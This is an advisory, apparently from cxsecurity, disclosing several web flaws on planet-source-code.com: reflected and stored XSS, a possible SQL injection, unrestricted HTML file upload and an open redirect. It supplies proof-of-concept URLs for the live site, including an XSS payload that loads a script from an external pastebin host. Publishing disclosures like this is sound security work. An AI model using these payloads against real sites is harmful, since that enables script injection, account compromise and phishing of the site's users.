Planet Source Code XSS / SQL Injection / Shell Upload

2014.11.17
Credit: DevilScreaM
Risk: High
Local: No
Remote: Yes
CVE: N/A

#Title : Planet Source Code - Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 15 November 2014
#Category : Web Applications
#Vendor : http://planet-source-code.com
#Greetz : newbie-security.or.id | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets

============================================================================================
Reflected Cross Site Scripting
Location : vb/scripts/BrowseCategoryOrSearchResults.asp
Parameter : txtCriteria
Reference : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
POC : http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria=[XSS+BYPASS_FILTERING]
Example : http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria="><SCRIPT/SRC="http://pastebin.com/raw.php?i=sUHjCcQ1"></SCRIPT>
Note : the example payload closes the attribute the search term is echoed into (the leading ">) and loads the script from an external host; the parameter is reflected without HTML encoding.

===========================================================================================
Stored Cross Site Scripting
POC :
1. You must register or log in to Planet Source Code.
2. After logging in, go to http://planet-source-code.com/vb/jobs/PostJob.asp?lngWId=8 and enter your cross-site scripting payload in the Job Title, Company and Description text boxes.
3. View the stored cross-site scripting at http://planet-source-code.com/vb/jobs/ListJobs.asp
Note : the payload is stored server-side and executes for every visitor of the job listing, so this affects other users without any further interaction from the attacker.

=============================================================================================
Reflected Cross Site Scripting
Location : vb/scripts/voting/VoteLog.asp
Parameter : txtCodeName
POC : http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=[YOUR_XSS]&txtCodeId=9431&intNumOfUserRatings=0
Example : http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=<script>alert("DevilScreaM")</script>&txtCodeId=9431&intNumOfUserRatings=0

===============================================================================================
Possible SQL Injection
Location : vb/jobs/ListJobs.asp
Parameter : txtMaxNumberOfEntriesPerPage
POC : http://planet-source-code.com/vb/jobs/ListJobs.asp?txtMaxNumberOfEntriesPerPage=10'
Note : the PoC only shows that a trailing single quote changes the page's behaviour, which indicates the value is concatenated into a query rather than bound as an integer. Data extraction is not demonstrated here, hence "possible".

================================================================================================
Arbitrary File Upload
POC :
1. You must register or log in to Planet Source Code.
2. After logging in, go to http://planet-source-code.com/vb/authors/new_author_login.asp?lngWId=1&blnExisistingAuthor=TRUE
3. Upload a TXT or HTML file via the Upload button (the author-photo upload does not restrict the extension).
4. After the upload, the file is served from http://planet-source-code.com/Upload_PSC/AuthorPhotos/[RANDOM_NAME].html
Example : http://planet-source-code.com/Upload_PSC/AuthorPhotos/AUTHOR_PHOTO201411151232354597.html
Note : the stored name is a server-generated prefix plus a timestamp, but the client-supplied extension is kept. An uploaded .html file is served from the site's own origin, so it is a persistent XSS / phishing page under planet-source-code.com even if server-side script extensions turn out to be blocked; the PoC only demonstrates TXT and HTML.

=====================================================================================================
URL Redirection
Location : vb/authentication/DeleteCookies.asp
Parameter : txtReturnURL
POC : http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=[URL]
Example : http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=http://newbie-security.or.id/
Note : the logout page redirects to any absolute URL given in txtReturnURL, so a link that logs the victim out and lands them on an attacker-controlled login lookalike is a practical phishing vector.
Copyright 2024, cxsecurity.com